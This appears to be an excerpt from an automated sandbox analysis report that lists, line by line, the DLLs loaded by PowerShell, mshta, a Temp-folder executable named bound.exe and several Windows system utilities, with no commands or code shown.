Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
